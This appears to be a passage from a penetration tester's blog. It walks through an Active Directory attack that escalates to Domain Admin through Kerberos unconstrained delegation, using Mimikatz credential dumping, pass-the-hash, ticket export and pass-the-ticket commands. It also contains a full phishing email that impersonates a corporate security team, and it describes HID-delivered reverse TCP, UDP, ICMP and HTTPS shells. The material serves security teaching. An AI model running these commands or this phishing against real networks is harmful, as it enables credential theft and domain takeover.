scripts are available in the <a href="https://github.com/samratashok/nishang">GitHub repository of Nishang</a>. Hope you liked it. Please leave feedback and comments. <br />
<br /></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
Join me for a two days training<b> "Offensive PowerShell for Red and Blue Teams" at Shakacon, Honolulu (2 days - July 11th - 12th, 2016)</b> - <a href="https://www.shakacon.org/trainings/offensive-powershell-for-red-and-blue-teams-by-nikhil-mittal/">https://www.shakacon.org/trainings/offensive-powershell-for-red-and-blue-teams-by-nikhil-mittal/</a></div>
</div>
<div style="text-align: justify;">
<br />
<br />
<br />
<b>References/Further Readings</b><br />
Casey and some of his work:<br />
<a href="https://twitter.com/subTee">https://twitter.com/subTee</a><br />
<a href="http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html">http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html</a><br />
<a href="https://github.com/subTee/SCTPersistence">https://github.com/subTee/SCTPersistence</a> <br />
<a href="https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302">https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302</a><br />
<br />
Detailed blog on JSRAT<br />
<a href="http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html">http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html</a><br />
<br />
Defenses against regsvr32:<br />
<a href="http://www.brimorlabsblog.com/2016/04/very-quick-blog-post-on-squiblydoo.html">http://www.brimorlabsblog.com/2016/04/very-quick-blog-post-on-squiblydoo.html</a><br />
<a href="https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique">https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique</a><br />
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com4tag:blogger.com,1999:blog-8135211063584500909.post-72797016838983719912016-02-28T22:55:00.001+05:302018-01-14T22:48:15.104+05:30Getting Domain Admin with Kerberos Unconstrained Delegation<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
A recent penetration test was one of the rare ones where it was not possible to locate a domain admin credential (password/hash/ticket) using the usual methods. I already had Administrator access to one of the server thanks to a file upload feature in an in-house log management dashboard running over WAMP (WAMP runs with SYSTEM privileges). I got access to few more servers by using hashes of a domain user who was local admin on couple more servers and some more similar stuff, but still no luck. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Anyway, after looking around for Active Directory and Kerberos related attacks for a while, it was time for reconsidering the attack approach. Recall the first thing which comes to mind when we fail at server side attacks? Absolutely! Client side attacks. I could drop <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">some emails with attachments and links</a> and hope for hitting a user machine which leads me to a server which has a Domain Admin token. The client, for his own reasons, wanted me to keep all the connect back shells/requests from phishing within the internal network and there was absolutely no outgoing traffic allowed towards my VPN machine.(Diagram build with <a href="http://draw.io/">draw.io</a>)</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx-LQmTnRwaFhdo_4o5qskiaMUZ6LCg7ND92i_MEjsVEGRm5Soq8wvBG1oJV4SoixkmCTlu3Ia2NHPKhyphenhyphenx2xNavPWgFKo9b3H3HhH01ss7ddPYlC-mDtbU9gBK7CeIMGHNYiq7g25TWS0/s1600/Kerberos+Unsonctrained+Delegation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx-LQmTnRwaFhdo_4o5qskiaMUZ6LCg7ND92i_MEjsVEGRm5Soq8wvBG1oJV4SoixkmCTlu3Ia2NHPKhyphenhyphenx2xNavPWgFKo9b3H3HhH01ss7ddPYlC-mDtbU9gBK7CeIMGHNYiq7g25TWS0/s400/Kerberos+Unsonctrained+Delegation.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
So, either I needed to setup multiple listeners on one of the compromised servers which can handle multiple connect back shells or some way to use an existing service as a listener for my phishing attacks. Since I am lazy :) I decided to go with the second option, that is, using an existing service. While enumerating the domain after initial foothold, I saw that a web server had <a href="http://blogs.msdn.com/b/autz_auth_stuff/archive/2011/05/03/kerberos-delegation.aspx">Kerberos Unconstrained Delegation</a> enabled.</div>
<div style="text-align: justify;">
<br />
Once I realized Kerberos Unconstrained Delegation was enabled, I could attempt to exploit this scenario using a technique Sean Metcalf (<a href="https://twitter.com/PyroTek3">@PyroTek3</a>) spoke about last year and published on ADSecurity.org (<a href="https://adsecurity.org/?p=1667">https://adsecurity.org/?p=1667</a>). Sean covers how exploiting a server with Kerberos Unconstrained Delegation can lead to credential theft of DA credentials resulting in Active Directory compromise by tricking a Domain Admin into connecting to any Kerberos service on the server.<br />
<br />
So, all that needed to be done was creating phishing emails and use them to connect back to the server where I had admin access and wait for a domain admin to fall for an email.<br />
<br />
Here is how I did it (replicated in my lab). </div>
<div style="text-align: justify;">
1. pfptlab-build is the server where we have admin access with RDP, PowerShell Remoting etc.<br />
2. pfptlab-web is the server where we can execute commands as admin but it is not directly accessible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_SsNhfKpkQj9_Mms3wgxZaVhWbTBEjSMHmt4aByH-u1slYUhMkZqjQLoITLpcaN234vx4AqX9e17NUCJGAuCCjHOyQ5z1kWhxHNX8NYRMBXGxWB9HSszcK839_mSm5WBETEww3c_iahU/s1600/Kerberos+Unsonctrained+Delegation+Lab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_SsNhfKpkQj9_Mms3wgxZaVhWbTBEjSMHmt4aByH-u1slYUhMkZqjQLoITLpcaN234vx4AqX9e17NUCJGAuCCjHOyQ5z1kWhxHNX8NYRMBXGxWB9HSszcK839_mSm5WBETEww3c_iahU/s400/Kerberos+Unsonctrained+Delegation+Lab.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h4>
Searching for computers with Unconstrained Delegation</h4>
By using the built-in Active Directory PowerShell Module. This module is available by default on Windows Server 2012. From an elevated shell on the server with admin access (pfptlab-build) use the below commands:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Add-WindowsFeature RSAT-AD-PowerShell
PS C:\> Import-Module ActiveDirectory
PS C:\> Get-ADComputer –Filter {(TrustedForDelegation –eq $True) –and (PrimaryGroupID –eq 515)}
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UJQCWboj4YMZYBJzqiT_GBX62WtWi1B1WCTY7DYLjXsRavPWqt8aJxCzl4D8W_kge_c5AXlQx92ShzAJZTvfza1i3YHTwPxB5yqxirpjz_uR-WUkkreNT0ktYYlY9ixH8LdQT5Gm_4c/s1600/Search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UJQCWboj4YMZYBJzqiT_GBX62WtWi1B1WCTY7DYLjXsRavPWqt8aJxCzl4D8W_kge_c5AXlQx92ShzAJZTvfza1i3YHTwPxB5yqxirpjz_uR-WUkkreNT0ktYYlY9ixH8LdQT5Gm_4c/s400/Search.png" width="400" /></a></div>
I have wrapped up above commands in a script Get-Unconstrained.ps1 found in the <a href="https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Get-Unconstrained.ps1">ActiveDirectory category of Nishang.</a><br />
<br />
Another way of searching for computers with Unconstrained Delegation is using Powerview:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-NetComputer -Unconstrained
</textarea></pre>
<h4>
Setting up the "Listener"</h4>
</div>
<div style="text-align: justify;">
On the server where unconstrained delegation is enabled (pfptlab-web in the lab), we can enumerate existing tickets using Invoke-Mimikatz. Keep in mind that we have admin access to the server with the help of hash of a domain user who is local admin on that server. Please note that we can pass the ticket as well but the expiry time of the ticket will play a spoilsport here as we need to wait till a domain admin connects to the machine.<br />
<br />
We can use the hash of domain user webadmin which is a local admin on the pfptlab-web, the server with unconstrained delegation:</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Invoke-Mimikatz -DumpCreds
PS C:\> Invoke-Mimikatz -Command '"sekurlsa::pth /user:webadmin /domain:pfptlab /ntlm:[ntlm hash] /run:powershell.exe"'
</textarea></pre>
This is how the output of these commands look like: <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElK8wDO-Mf8JGTX7yMrXByziCZRJjRopqrcM9qdqQ3mmf5a-N6_4cRlUXWI-_vubjx4ne73GqJqizkNXx7KPRiBqWRkts-jR_2P4HFY3CT-VXdwPsvbEE5oGNDkjZs___jo2SfByiHSg/s1600/webadmin_hashes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElK8wDO-Mf8JGTX7yMrXByziCZRJjRopqrcM9qdqQ3mmf5a-N6_4cRlUXWI-_vubjx4ne73GqJqizkNXx7KPRiBqWRkts-jR_2P4HFY3CT-VXdwPsvbEE5oGNDkjZs___jo2SfByiHSg/s400/webadmin_hashes.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlmTGZor5NtHbK-TL4X5ALgm-hTmK6oXqDsqFiPiW3Pa0dvvq6eNtzZCBAAM7eK7gBsRHcxJGDdyTSnwMqu5qojpOoHfkXN4qquxy2HNAs3WBLAQ3wKD92g8VWsIrr80oEnms-iAeJnaM/s1600/webadmni_PSSession.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlmTGZor5NtHbK-TL4X5ALgm-hTmK6oXqDsqFiPiW3Pa0dvvq6eNtzZCBAAM7eK7gBsRHcxJGDdyTSnwMqu5qojpOoHfkXN4qquxy2HNAs3WBLAQ3wKD92g8VWsIrr80oEnms-iAeJnaM/s400/webadmni_PSSession.png" width="400" /></a></div>
Now, let's list tickets on pfptlab-web, the server with Unconstrained Delegation. Since, we have direct access to the pfptlab-build machine, let's *drop the script on disk* there and use below commands to use it in a stateful session on pfptlab-web without touching disk. Remember that below commands need to be run in the PowerShell console opened by over-passing the hash of the webadmin user:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> $sess = New-PSSession -ComputerName pfptlab-web
PS C:\> Invoke-Command -FilePath C:\Users\buildadmin\Desktop\Invoke-Mimikatz.ps1 -Session $sess
PS C:\> Invoke-Command -ScriptBlock {cd $env:TEMP} -Session $sess
PS C:\> Invoke-Command -ScriptBlock {Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'} -Session $sess
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh57yLWn5GxAHZgAK4TNpR1mRVB1cqLzovA2a2l-8TkgdBpSgLI9LonQVYxh6a7iq32jmCm3losy9YgffgzDR8DAHuoiNeADFRi7NYnGaEEA-hDc2z2KKeYYb7aotqh3vzTvvl2aBlRMcw/s1600/tcikets_webadmin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh57yLWn5GxAHZgAK4TNpR1mRVB1cqLzovA2a2l-8TkgdBpSgLI9LonQVYxh6a7iq32jmCm3losy9YgffgzDR8DAHuoiNeADFRi7NYnGaEEA-hDc2z2KKeYYb7aotqh3vzTvvl2aBlRMcw/s400/tcikets_webadmin.png" width="400" /></a></div>
<br />
<i>An alternate way with a catch!</i><br />
A quick thing to note here. If we try to use below command (to execute Invoke-Mimikatz on pfptlab-web without dropping the script to disk on pftplab-build) there will be an error.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ArgumentList '-Command "sekurlsa::tickets"' -ComputerName pfptlab-web
</textarea></pre>
Because, we cannot pass named parameters in the -ArgumentList parameter. It is not possible to pass "-Command '"sekurlsa::tickets"'" in the above case. We can pass only the positional parameters. To overcome this I changed the positions of the parameters. I assigned position 0 to the "Command" parameter of Invoke-Mimikatz and the above command worked successfully. Now the catch! If I add "/export" to the ArgumentList parameter in the above command, it fails as PowerShell passes it to the Invoke-Mimikatz as second parameter. If anyone is able to do that successfully, please share!<br />
<br />
So, assuming that we have enumerated the Domain Administrator accounts already and one of them is the "Administrator", to know if a domain admin has connected we can use the following ugly method:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> $output = Invoke-Command -ScriptBlock {(ls $env:temp\*.kirbi).name} -Session $sess
PS C:\> $output | sls Administrator
</textarea></pre>
May be someone will automate this in a much cleaner way. If a ticket of the Domain Administrator, Administrator, is saved by Mimikatz, the second command above should list it. But, no Domain Admin ticket on pfptlab-web, yet.<br />
<h4>
Preparing email</h4>
</div>
<div style="text-align: justify;">
Fortunately, the client's internal mail server allowed email relaying so sending phishing emails was not a problem. I was able to get access to email ids with a combination of AD usernames and couple of email excel files I got my hands on. After sharing the emails with the client, he removed emails of some guys from the management. One of the multiple email templates used was: <br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">Hey,
I am from the Corporate Security Team, we look after security here. We have detected multiple anomalies in the network which could be traced back to your system. It could be a virus or a trojan attack which blocks you from accessing company resources. You are required to immediately perform all of the below steps:
1. Click on Start Menu -> Type cmd.exe
2. In the Window which opens up. type "reg query HKLM\SOFTWARE\Microsoft\"
3. Copy the contents of above command in a text file.
4. Go to \\[name of server with unconstrained delegation]\C$ and copy the file there.
5. If you are unable to access the share, just save the text file with the name Sotware_log.txt on your Desktop and we will pick it up.
Cheers,
Corporate Security Team
</textarea></pre>
While I am no expert in crafting phishing emails, I would like you to note some points in the above email:<br />
- No intimidation but a balanced tone of Authority.<br />
- Use of jargon but not too obscure words, as if I was really trying to explain complex things in simple terms to the user. <br />
- Requirment of urgent action by the target user.<br />
- Command which displays a lot of output.<br />
- Providing an alternate way to the user if they can't access the share which makes me look more helpful.<br />
Though I tried to pick the "email culture" of the client from the emails I exchanged, surely, this email could be written in a lot better way. <br />
<br />
Using the below command, email was sent to users.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Send-MailMessage -From "Corporate Security<corporate.security@client.com>" -To $recipients -Subject "Security Anomaly: Action Required" -Body (Get-Content C:\Users\buildadmin\Desktop\email.txt | Out-String) -SmtpServer [IP of internal mail server]
</textarea></pre>
This is how the email looked in like in mailbox of one of the targets.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMchUz1poPq-Se-gxdIcm36s-9Vi49m8MdRcKrBFlh2CSkGb9FwoOcL_Gyr7oTZJ1asZXiPDjs9uGmD1U-gaAbdf2WuIsfItQeHXW94jWUp9fsBxxBT_B9u3dZKsWXlOTvAucWuVSrBSw/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMchUz1poPq-Se-gxdIcm36s-9Vi49m8MdRcKrBFlh2CSkGb9FwoOcL_Gyr7oTZJ1asZXiPDjs9uGmD1U-gaAbdf2WuIsfItQeHXW94jWUp9fsBxxBT_B9u3dZKsWXlOTvAucWuVSrBSw/s400/email.png" width="400" /></a></div>
<br />
<h4>
Execution</h4>
</div>
<div style="text-align: justify;">
After sending email, I started checking the tickets for Domain Administrator by running Invoke-Mimikatz repeatedly and soon there were more than one domain administrators who complied to whatever they were asked to do :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUzelcdocJSfZehqS71YgQE_hXahKGv6Z01V0jttKosxZEq6zYe0bnXpDkBCt_YqDmj1wIoyiRtqzOzCS7CSHGjGYQxUjGQbXRijmFcOlz2BnuV1zds0XNcvR-Flyx-2aroCvhsQy-N2M/s1600/DA_Ticket_Found.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUzelcdocJSfZehqS71YgQE_hXahKGv6Z01V0jttKosxZEq6zYe0bnXpDkBCt_YqDmj1wIoyiRtqzOzCS7CSHGjGYQxUjGQbXRijmFcOlz2BnuV1zds0XNcvR-Flyx-2aroCvhsQy-N2M/s400/DA_Ticket_Found.png" width="400" /></a></div>
Now, in my opinion, the best way to use the tickets is to copy them to the pfptlab-build server as we have direct connectivity to it. Using the below command we can copy all the tokens from the pfptlab-web to pfptlab-build machine.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Copy-Item \\pfptlab-web\C$\Users\WEBADM~1.PFP\AppData\Local\Temp\*.kirbi C:\tickets
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJM6EVIXCWrYrp6TUGRlJyW4u1ksQ-pQl5IgQzwhd1-mBj7MN227hYnqG03kdYz_Dc2SdaUdGPPfSjgvuL0Yv8NjIMyoA3n6Cu9gIwfQPa5FY0i0mLiPKpXi67VikqGyFPS9DPwif3C0/s1600/copy_tokens.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJM6EVIXCWrYrp6TUGRlJyW4u1ksQ-pQl5IgQzwhd1-mBj7MN227hYnqG03kdYz_Dc2SdaUdGPPfSjgvuL0Yv8NjIMyoA3n6Cu9gIwfQPa5FY0i0mLiPKpXi67VikqGyFPS9DPwif3C0/s400/copy_tokens.png" width="400" /></a></div>
Now, we can use one of the Administrators tickets copied locally to elevate our privileges to Domain Administrator:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-Mimikatz -Command '"kerberos::ptt [Ticket]
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySFVwI9_YNZ7rRvPHi6_NRa6LIVH0CRWjeKEQeyi3OFu7Bt1EgFjzLF3Jd65s-LrFqbfp5-Rwbci3YmThcoBJnlUea1llN5xAU53-HbXaq1oK0UOsjs_egnFpFizXv1wZ9MEwiwR6_kM/s1600/DA_Privilege.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySFVwI9_YNZ7rRvPHi6_NRa6LIVH0CRWjeKEQeyi3OFu7Bt1EgFjzLF3Jd65s-LrFqbfp5-Rwbci3YmThcoBJnlUea1llN5xAU53-HbXaq1oK0UOsjs_egnFpFizXv1wZ9MEwiwR6_kM/s400/DA_Privilege.png" width="400" /></a></div>
Awesome! Finally Domain Admin access. Let the victory dance begin :D :D<br />
<br />
Here is a quick video to demonstrate the attack:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/s_vi/waukDKApzHo/default.jpg?sqp=CLzRzLYF&rs=AOn4CLB_Bi0jLIV2fk7e7L-Q1xXaTjeEgA" frameborder="0" height="266" src="https://www.youtube.com/embed/waukDKApzHo?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
After getting the DA access, I gathered some business related data to demonstrate actual impact to the client management. <br />
<br />
Please leave feedback and comments. <br />
<br /></div>
<div style="text-align: justify;">
<div style="text-align: left;">
Learn penetration testing of a highly secure, live Windows network with me in <b>PowerShell for Penetration Testers Training</b> at:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>CanSecWest, Vancouver (4 days - March 12-15th, 2016)</b> - <a href="https://cansecwest.com/dojos/2016/powershell.html">https://cansecwest.com/dojos/2016/powershell.html</a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>Brucon, Gent, Belgium (3 days - April 20-22nd, 2016) - </b><a href="http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers">http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers</a></div>
<div style="text-align: left;">
<b><br />
</b></div>
<div style="text-align: left;">
<b>HITB, Amsterdam (2 days - May 24-25th, 2016) - </b><a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a><b><br />
</b></div>
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-28267500314495304672016-02-11T15:35:00.000+05:302018-01-14T22:48:14.848+05:30Hacking with Human Interface Devices - Easy Reverse Shells<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<br />
Kautilya has the ability to do <a href="http://www.labofapenetrationtester.com/2014/07/kautilya-050.html">interesting</a> and <a href="http://www.labofapenetrationtester.com/2015/01/dropping-weaponized-files-using-hid.html">useful</a> stuff using a Human Interface Device. But sometimes, nothing beats a simple reverse shell. Recently, I added some new payloads to Kautilya which are useful for getting reverse shells using different protocols.<br />
<br />
This post describes the payloads which give us the capability of having reverse connect PowerShell shells from Windows targets. With these payloads, Kautilya now has improved capability to provide us with a foothold machine in penetration testing engagements where use of Social Engineering techniques is allowed. Those who follow my other tool Nishang, I did a <a href="http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html">five part blog series on that</a>.</div>
<div style="text-align: justify;">
<br />
<br />
Lets see the payloads in action.<br />
<br />
<h4>
Reverse TCP and Reverse UDP</h4>
Both of the payloads can be used with a standard netcat listener both on Windows and Linux. On Windows, <a href="https://github.com/besimorhino/powercat">Powercat </a>can also be used. We just need to provide the IP to which the target connects back and the port to use. Upload it to a HID and send it to a target.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfHjuf0evT_P2n3qHYWNLOajLMMV9eG_ARUfPVNwBj2P65zyeK5TPJP9SACYJgT5z6UADTvyrn17HgQOnnJHE0T9f5IAroCxs967gpunTPnvCyIN3rlejQ9Ark_2qEuDyQ1PExC4akWzY/s1600/UDP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfHjuf0evT_P2n3qHYWNLOajLMMV9eG_ARUfPVNwBj2P65zyeK5TPJP9SACYJgT5z6UADTvyrn17HgQOnnJHE0T9f5IAroCxs967gpunTPnvCyIN3rlejQ9Ark_2qEuDyQ1PExC4akWzY/s400/UDP.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
When a target connects the device, this is how it looks like at the listener. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQfjEY4xMMy67g74WbS8jTGI8KJP92Lp0M9Gk8E07LU_WBta8t2lM5nYP7AOcNyiLKB6hLlGbvyku0uwuPQHmikNBlqVWwXTEqJJBnjr4XFDvgUTkSYqarqsLEZKEV1JTyyYC83_afiVs/s1600/UDP_Reverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQfjEY4xMMy67g74WbS8jTGI8KJP92Lp0M9Gk8E07LU_WBta8t2lM5nYP7AOcNyiLKB6hLlGbvyku0uwuPQHmikNBlqVWwXTEqJJBnjr4XFDvgUTkSYqarqsLEZKEV1JTyyYC83_afiVs/s400/UDP_Reverse.png" width="400" /></a></div>
<span id="goog_496891289"></span><span id="goog_496891290"></span><br />
<span id="goog_496891289">Neat! An intercative reverse PowerShell shell. </span><br />
<br />
<h4>
<span id="goog_496891289">Reverse ICMP</span></h4>
<br />
<span id="goog_496891289">My favorite one for bypassing network restrictions, a reverse shell completely over ICMP. This payload needs a listener, icmpsh_m.py, from the <a href="https://github.com/inquisb/icmpsh">icmpsh suite</a>. Run the command "sysctl -w net.ipv4.icmp_echo_ignore_all=1" and start the listener. This is how it looks like on a successful connection:</span><br />
<span id="goog_496891289"><br />
</span> <span id="goog_496891289"></span><span id="goog_496891290"></span><span id="goog_192972939"></span><span id="goog_192972940"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRCfSnsf_YIMQOsE_2kTKR658_U6zXIFUSucqojdT32ef_md-EVXdJaPWC-QEVI6uNoJqQEcoej4hjLEBUB1kiyv7aSqhPtcw_-pkJd3FTMeW_86XvL_2DTsZwUgloKfxRsZjJcYQmO4/s1600/ICMP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRCfSnsf_YIMQOsE_2kTKR658_U6zXIFUSucqojdT32ef_md-EVXdJaPWC-QEVI6uNoJqQEcoej4hjLEBUB1kiyv7aSqhPtcw_-pkJd3FTMeW_86XvL_2DTsZwUgloKfxRsZjJcYQmO4/s400/ICMP.png" width="400" /></a></div>
This one has been useful in so many penetration tests.<br />
<br />
<h4>
Reverse HTTPS and Reverse HTTP</h4>
Reverse HTTPS is proxy aware and uses valid HTTPS traffic for reverse PowerShell shell. Its target part (typing done on the target machine) is very small and this makes it very useful. Currently, a listener on Windows is required. Run Invoorke-PoshRatHttps.ps1 in the extras directory of Kautilya from an elevated shell. The listener script adds exception to the Windows Firewall for incoming requests on the specified port.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOc-uqXoVMeBIus4r-n-cWtyG2tCBXbplyLhnU_9kWcKl5s7nL4lftxtXnwsglS1_3YYtcGUB0bg4cJXCsoMwOP9Hx7TsjiTPrT3iwR8o8XsP7uc3DwVHvWxkyo5gJgHj9yMvA2L4deqc/s1600/HTTPS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOc-uqXoVMeBIus4r-n-cWtyG2tCBXbplyLhnU_9kWcKl5s7nL4lftxtXnwsglS1_3YYtcGUB0bg4cJXCsoMwOP9Hx7TsjiTPrT3iwR8o8XsP7uc3DwVHvWxkyo5gJgHj9yMvA2L4deqc/s400/HTTPS.png" width="400" /></a></div>
<br />
Awesome, isn;t it? <br />
<br />
Hope you liked the post! As always I look forward for feedback and comments.<br />
<span id="goog_496891289"></span><span id="goog_496891290"></span><br />
<br />
<div style="text-align: left;">
Learn penetration testing of a highly secure live Windows network with me in <b>PowerShell for Penetration Testers Training</b> at:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>CanSecWest, Vancouver (4 days - March 12-15th, 2016)</b> - <a href="https://cansecwest.com/dojos/2016/powershell.html">https://cansecwest.com/dojos/2016/powershell.html</a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>Brucon, Gent, Belgium (3 days - April 20-22nd, 2016) - </b><a href="http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers">http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers</a><b></b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>HITB, Amsterdam (2 days - May 24-25th, 2016) - </b><a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a><b><br /></b></div>
</div>
</div>
<br /></div>
